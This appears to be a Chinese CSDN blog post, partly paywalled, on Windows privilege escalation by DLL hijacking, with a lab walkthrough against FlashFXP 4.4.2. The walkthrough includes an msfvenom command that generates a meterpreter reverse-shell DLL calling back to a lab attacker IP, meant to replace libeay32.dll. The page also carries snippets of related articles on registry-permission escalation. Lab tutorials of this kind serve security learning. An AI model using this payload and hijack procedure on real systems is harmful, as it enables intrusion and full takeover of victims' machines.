Windows提权---DLL注入/不带引号的服务路径/注册表

最新推荐文章于 2023-08-13 12:20:10 发布
最新推荐文章于 2023-08-13 12:20:10 发布
阅读量1k 收藏 2
点赞数
分类专栏: window提权 文章标签: windows web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40012781/article/details/125579100
版权

DLL注入提权 

Windows程序启动的时候需要DLL。如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL来提权。通常,Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

应用程序加载的目录
C:\Windows\System32
C:\Windows\System
C:\Windows
当前工作目录Current Working Directory,CWD
在PATH环境变量的目录(先系统后用户)

这样的加载顺序很容易导致一个系统dll被劫持,因为只要攻击者将目标文件和恶意dll放在一起即可,导致恶意dll先于系统dll加载,而系统dll是非常常见的,所以当时基于这样的加载顺序,出现了大量受影响软件。

参考文章:DLL劫持原理及其漏洞挖掘(一) - 安全客,安全资讯平台

》》》利用条件《《《

技术比较鸡肋,需要满足以下条件才能成功...

  • 这个软件可以被利用
  • 有权限替换dll文件
  • 受害者会运行与这个dll文件相关的软件

FlashFXP DLL劫持 

利用思路:通过webshell进行信息收集,制作dll木马并上传,替换dll,启动应用后成功反弹shell.....

实验环境

操作系统

软件/角色

Wins08R2

FlashFXP 4.4.2绿色版/受害机

Kali 2022

MSF/攻击机

 步骤一:通过火绒剑分析FlashFXP程序的DLL,找到非系统DLL文件就可以退出FlashFXP程序....55410569784c13240549cbdce097a62c.png

步骤二:使用MSF生成恶意的DLL文件并替换FlashFXP中的源文件....libeay32.dll

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.113 lport=5555 -f dll >./hack.dll

最低0.47元/天 解锁文章
懒猫的sky
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
49-5 内网渗透 - 服务注册表权限脆弱提权
weixin_43263566的博客
06-28 144
Windows操作系统中的注册表存储了每个系统服务的相关条目。注册表使用访问控制列表(ACL)来管理用户对其条目的访问权限。如果注册表的ACL配置不正确,可能导致低权限用户获得对服务注册表的写入权限。攻击者可以利用这一漏洞修改注册表内容,例如修改服务的二进制文件路径(ImagePath键),从而改变服务启动时的行为。
tcnative-1.dll 包括32位/64位
08-15
在解压这个压缩包后,你需要将包含tcnative-1.dll的目录添加到Tomcat的系统路径或者Java的`java.library.path`中,以便Tomcat在启动时能够找到并加载这个库。 配置完成后,为了验证是否成功,你可以检查Tomcat的...
windows-提权常用技巧总结
weixin_54217950的博客
03-03 5592
Windows提权相关的技术总结 Windows内核利用 如果该系统经常升级,那么这些利用方式可能不会那么有效。你可以使用Watson检查看看有没有因为没有打补丁而产生的漏洞。现在Watson已经整合进winPEAS了。一旦你发现任何漏洞,你都可以在下面的仓库中下载到相同的漏洞。这里你要确保下载的架构和你目标架构一致 。如果你需要编译二进制文件,你可以使用kali进行交叉编译。 https://github.com/SecWiki/windows-kernel-exploits 第一步:提取systemin
注册表提权
weixin_45682070的博客
11-21 1201
注册表提权原理: 将一个伪造的服务,通过注册表写入,在开启这个服务,那么伪造的服务就会运行我们的恶意代码(服务是以system权限运行的) NT AUTHORITY\INTERACTIVE 当前用户的权限,利用他可以完全控制注册表的权限提权(如果配置不当) powershell Get-Acl -Path hklm:\System\CurrentControlSet\services\* | select Path,AccessToString |Format-List > 1.txt 在1.txt
提权DLL注入
Ms08067安全实验室
03-23 1017
DLL注入是一种允许攻击者在另一个进程的地址空间的上下文中运行任意代码的技术。如果进程中以过多的权限运行,那么可以会被攻击者加以利用,以便以DLL文件的...
浅谈windows提权
灰太的表格的博客
11-10 2293
浅谈windows提权
内网渗透笔记——注册表自启动与msi提权
wang_zui_zui的博客
02-24 4819
目的:进行持久化的连接 最简单的自启动: 自启动文件夹:开始➡程序➡启动(win7下) 除了通过文件夹,还可以利用Windows配置文件: win.ini、system.ini、wininit.ini等等,加载一些自动运行的程序 如果打开win.ini文件,文件中有[windows]字段,后跟Run=文件路径 LOAD=文件路径,就是我们要自启动的东西,但如果本身没有[windows]字段,手动去添加的话一般都是失败的 [windows] Run=正常运行 LOAD=启动后自动最小化运行
解决api-ms-win-crt-runtime-l1-1-0.dll 丢失问题 绿色版 工具下载
07-27
提示api-ms-win-crt-runtime-l1-1-0.dll 丢失,安装这个小玩意就可以解决了
注册表修复工具 -dll-fixer -带破解工具
03-26
Serial 64bit DLL-Files Fixer.reg(64位系统)文件导入注册表! 7、恭喜你,你成功了!^_^ 备 注:如果软件有访问网络的请求,请用防火墙将它拦截下来,不让软件访问网络验证注册码,这个很重要。另外最好关闭软件...
api-ms-win-core-path-l1-1-0.dll
04-18
标题中的"api-ms-win-core-path-l1-1-0.dll"是Windows操作系统中的一个核心动态链接库(DLL)文件,它属于Windows API的一部分,主要负责处理路径相关的操作。DLL(Dynamic Link Library)文件是Windows系统中的一种...
api-ms-win-core-path-l1-1-0.dll【说明:Windows动态链接库、DLL、64位】
07-19
api-ms-win-core-path-l1-1-0.dllWindows操作系统中的一个64位动态链接库(DLL),属于Windows系统文件的一部分。它提供了用于路径管理的系统函数的接口,为程序提供了有效地处理文件和目录路径的能力,从而增强了...
Windows系统提权简单总结
Aiwin的博客
07-13 1830
Windows系统提权简单总结
Windows权限提升—BypassUAC、DLL劫持、引号路径服务权限等提权
剁椒鱼头没剁椒的博客
03-29 1748
关于Windows提权应该这篇总结完就结束了,再次提醒一下关于第三方软件或插件提权,不是不写,而且有些软件都会自动更新,很多漏洞基本上很少遇到,同时也利用不了,比如说:向日葵有一个版本能够提权,但是现在那个版本装再电脑上,根本连接不上向日葵的服务器,更何谈提权呢,同时还可以看日志,目前日志也更改了,端口不会再日志中出现了。前面几篇文章我就汇总在下面了,同时关于UAC提权之前一篇文章写的没那么细,这里重新补充一下。Windows权限提升—令牌窃取、UAC提权、进程注入提权
DLL注入提升进程权限(有时还需要注入程序使用管理员权限运行)
csdn_gddf102384398的博客
06-10 1264
void SetToken() { HANDLE hToken; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { printf("打开进程的访问令牌失败\n"); return; } LUID luid; if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) { prin
windows提权之BypassUAC&DLL劫持&引号路径&服务权限提权
m0_62207170的博客
03-21 1157
windows提权之BypassUAC&DLL劫持&引号路径&服务权限提权
【逆向工程核心原理:DLL注入
qq_42363151的博客
03-29 678
注册表编辑器中,将要注人的DLL路径字符串写人AppInit DLLs项目,然后把LoadAppInit DLLs的项目值设置为1。3、重启系统会发现所有加载user32.dll的进程都注入了myhack2.dll,如果打开notepad还会启动 IE。实验成功前提:notepad的kernel32.dll和InjectDll的地址一样。编辑修改AppInit_ DLLs表项的值,输人myhack2.dII的完整路径。被注入DLL就干了两件事,一个是输出了一串字符串,二是下载了一个网页。
DLL 注入的三种方法详解
weixin_51409218的博客
02-27 3895
DLL注入的三种方式
获取Webshell的常用方法(二)
Captain_RB的博客
12-12 1238
文章目录一、确定路径二、Webshell提权三、木马免杀 一、确定路径 注:常见WEB默认根目录 WAMP Server:${INSTALL_DIR}/www/ XAMPP:${INSTALL_DIR}/htdocs/ IIS:C:\inetpub\wwwroot\ Tomcat:${INSTALL_DIR}/webapps/root/ 重点在于网站根路径的获取,可以通过以下方法获取: 在路径后添加’、=-1等错误参数,看报错是否含有路径信息 利用工具暴破网站子目录:info.php、phpinfo.ph
创建傀儡进程svchost.exe并注入DLL文件(Shellcode)
最新发布
【Rainbow Network Technology co., LTD】
08-13 713
本文主要利用 SetThreadContext 修改进程中的线程上下文来实现Dll注入(ShellCode)。
Windows x86/x64 Ring3 Dll注入方法详解与提权技巧
本文档详细介绍了Windows x86和x64架构下Ring3层动态链接库(Dll)注入的技术总结。Ring3层,也称为用户态或普通态,是操作系统核心模式(Ring 0)之外的执行级别,程序在此状态下运行时拥有较低的权限,但仍然允许进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值